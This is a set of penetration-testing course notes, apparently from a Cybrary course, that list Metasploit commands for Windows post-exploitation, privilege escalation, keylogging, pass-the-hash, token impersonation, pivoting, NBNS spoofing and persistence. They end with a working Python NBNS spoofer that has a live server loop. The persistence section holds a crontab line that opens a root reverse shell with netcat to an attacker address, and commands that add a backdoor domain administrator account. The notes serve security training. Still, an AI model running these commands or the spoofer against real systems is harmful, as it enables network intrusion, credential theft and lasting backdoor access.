Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary

(1) Metasploit Scripts
msf > use post/windows/gather/enum_logged_on_users

(2) Railgun: Meterpreter extension that exposes the Windows API from inside the session
meterpreter > irb
>> client.railgun.shell32.IsUserAnAdmin

(3) Local Privilege Escalation: GetSystem
meterpreter > getsystem

(4) Local Privilege Escalation: Local Exploits
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > set payload windows/meterpreter/reverse_tcp
Local exploit modules also need SESSION set to the existing Meterpreter session they run through.

(5) Local Privilege Escalation: Bypassing UAC
msf > use exploit/windows/local/bypassuac

(6) Local Privilege Escalation: Using a Public Exploit
Public exploits live in /usr/share/exploitdb on Kali.

(7) Local Information Gathering: Searching for Files
meterpreter > search -f *password*

(8) Local Information Gathering: Gathering Passwords
Credential-harvesting post modules are under /usr/share/metasploit-framework/modules/post/windows/gather/credentials

(9) Local Information Gathering: Keylogging
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

(10) Lateral Movement: PSExec
msf > use exploit/windows/smb/psexec

(11) Lateral Movement: Pass the Hash
Replace the password (SMBPass) with the LM:NTLM hash from hashdump. We are still able to authenticate using PSExec, because the NTLM challenge-response is computed from the hash; the cleartext password is never needed.

(12) Lateral Movement: Token Impersonation
meterpreter > load incognito
meterpreter > list_tokens -u
Then impersonate_token with one of the listed users.

(13) Lateral Movement: SMB Capture
Set up an SMB capture server in Metasploit (auxiliary/server/capture/smb, as in (16)). Drop into a shell in a session with an impersonated token and connect to the capture server's share: the impersonated user's NetNTLM challenge-response is sent to us and can be cracked offline.

(14) Pivoting through Metasploit
msf > route add 172.16.85.0 255.255.255.0 2
Routes traffic to the 172.16.85.0/24 network through session 2.

(15) Pivoting with socks4a and proxychains
msf > use auxiliary/server/socks4a
Edit /etc/proxychains.conf and change the port to 1080.
proxychains nmap -Pn -sT -sV -p 445,446 172.16.85.190
-Pn and -sT are required: proxychains only relays full TCP connections, so ICMP ping probes and SYN scans would not go through the pivot.

(16) NBNS Spoofing
Listen for NBNS requests and respond to them; this can get machines to send us hashes or possibly even plaintext credentials.
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set SPOOFIP 192.168.20.9
msf auxiliary(nbns_response) > exploit
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /root/johnsmb
msf auxiliary(smb) > exploit
msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set LOGFILE /root/httplog
msf auxiliary(http_ntlm) > set URIPATH /
msf auxiliary(http_ntlm) > set SRVPORT 80
msf auxiliary(http_ntlm) > exploit

(17) Responder
Automates NBNS spoofing attacks.
cd Responder
python Responder.py -i 192.168.20.9
(Newer Responder versions take the interface instead of the IP: -I eth0.)

(A) Persistence: Adding a User
net user john johnspassword /add /domain
net localgroup administrators john /add /domain
Without /domain the commands act on the local machine; adding /domain at the end runs them against the domain controller, so the user is added to the domain as well.

(B) Persistence: With Metasploit Script
The Metasploit persistence script creates an autorun entry in the registry. Not stealthy: it writes the payload to disk.
meterpreter > run persistence -r 192.168.20.9 -p 2345 -U
-r and -p are the handler's IP and port; -U starts the payload when a user logs on. (The script has since been deprecated in favour of exploit/windows/local/persistence.)

(C) Persistence: Crontabs
Add to the /etc/crontab file:
*/10 * * * * root nc 192.168.20.9 12345 -e /bin/bash
service cron restart
Every 10 minutes cron connects back to a listener on 192.168.20.9:12345 with a root shell. -e requires a netcat build that supports it (nc.traditional or ncat); the OpenBSD nc shipped on many distributions does not.
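What nbns_response and Responder in (16) and (17) actually do on the wire, as an added example (this is my own illustration, not the original page's notes and not Metasploit's or Responder's code): parse a broadcast NBNS name query (RFC 1002) and answer it with a positive name response that points the victim at the spoof IP. The host name FILESRV, the transaction ID and the query packet are constructed for the example; 192.168.20.9 is the attacker address used throughout the page. The live `serve()` loop is included for completeness but is not run by the demo.

```python
"""NBNS (NetBIOS Name Service, RFC 1002) name-query spoofing logic."""
import socket
import struct

NBNS_PORT = 137
QTYPE_NB = 0x0020    # NetBIOS general name service record
QCLASS_IN = 0x0001


def encode_nb_name(name: str, suffix: int = 0x20) -> bytes:
    """First-level encoding: 15-char space-padded name + 1 suffix byte, each
    nibble written as 'A' + nibble, framed as one 32-byte DNS-style label."""
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    encoded = bytearray()
    for b in raw:
        encoded.append(0x41 + (b >> 4))
        encoded.append(0x41 + (b & 0x0F))
    return b"\x20" + bytes(encoded) + b"\x00"


def decode_nb_name(encoded: bytes) -> tuple:
    """Reverse of encode_nb_name for the 32 encoded bytes (no length/terminator)."""
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_nbns_query(txid: int, name: str, suffix: int = 0x20) -> bytes:
    """Name Query Request as a B-node broadcasts it (flags 0x0110: opcode QUERY, RD, B)."""
    header = struct.pack("!HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    return header + encode_nb_name(name, suffix) + struct.pack("!HH", QTYPE_NB, QCLASS_IN)


def parse_nbns_query(pkt: bytes):
    """Return (txid, name, suffix) for an NB name query, else None.
    Rejecting responses (R bit set) matters: a spoofer that answers its own
    or another spoofer's responses loops forever."""
    if len(pkt) < 50:
        return None
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000 or (flags >> 11) & 0xF != 0 or qdcount != 1:
        return None
    if pkt[12] != 0x20 or pkt[45] != 0x00:      # label length 32, then terminator
        return None
    qtype, qclass = struct.unpack("!HH", pkt[46:50])
    if qtype != QTYPE_NB or qclass != QCLASS_IN:
        return None
    name, suffix = decode_nb_name(pkt[13:45])
    return txid, name, suffix


def build_nbns_response(txid: int, name: str, suffix: int, spoof_ip: str, ttl: int = 165) -> bytes:
    """Positive Name Query Response: same txid, flags R|AA|RD (0x8500), one
    answer RR whose RDATA is NB_FLAGS (B-node, unique name) + the spoofed IPv4."""
    header = struct.pack("!HHHHHH", txid, 0x8500, 0, 1, 0, 0)
    rr = encode_nb_name(name, suffix) + struct.pack("!HHIH", QTYPE_NB, QCLASS_IN, ttl, 6)
    rdata = struct.pack("!H", 0x0000) + socket.inet_aton(spoof_ip)
    return header + rr + rdata


def spoof_reply(pkt: bytes, spoof_ip: str, only_names=None):
    """Decide whether and how to answer one received datagram."""
    parsed = parse_nbns_query(pkt)
    if parsed is None:
        return None
    txid, name, suffix = parsed
    if only_names is not None and name not in only_names:
        return None     # optional allow-list, like answering only for chosen names
    return build_nbns_response(txid, name, suffix, spoof_ip)


def serve(spoof_ip: str, only_names=None):
    """Live loop (needs root for UDP/137 and a LAN with NBNS traffic); not run here."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", NBNS_PORT))
    while True:
        pkt, (src_ip, src_port) = sock.recvfrom(1024)
        reply = spoof_reply(pkt, spoof_ip, only_names)
        if reply:
            sock.sendto(reply, (src_ip, src_port))


if __name__ == "__main__":
    # Constructed query: a victim asks who "FILESRV" (file-server suffix 0x20) is.
    query = build_nbns_query(0x1234, "FILESRV")
    reply = spoof_reply(query, "192.168.20.9")
    print("query :", query.hex())
    print("reply :", reply.hex())
    print("parsed:", parse_nbns_query(query))
    # Our own reply must never be treated as a query:
    assert spoof_reply(reply, "192.168.20.9") is None
```

The victim that receives the reply will then connect to 192.168.20.9 for whatever it wanted from FILESRV (an SMB share, a WPAD proxy, a printer), which is why the capture/smb and capture/http_ntlm servers are started alongside the spoofer.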
Author: Vitali Kremez, July 2016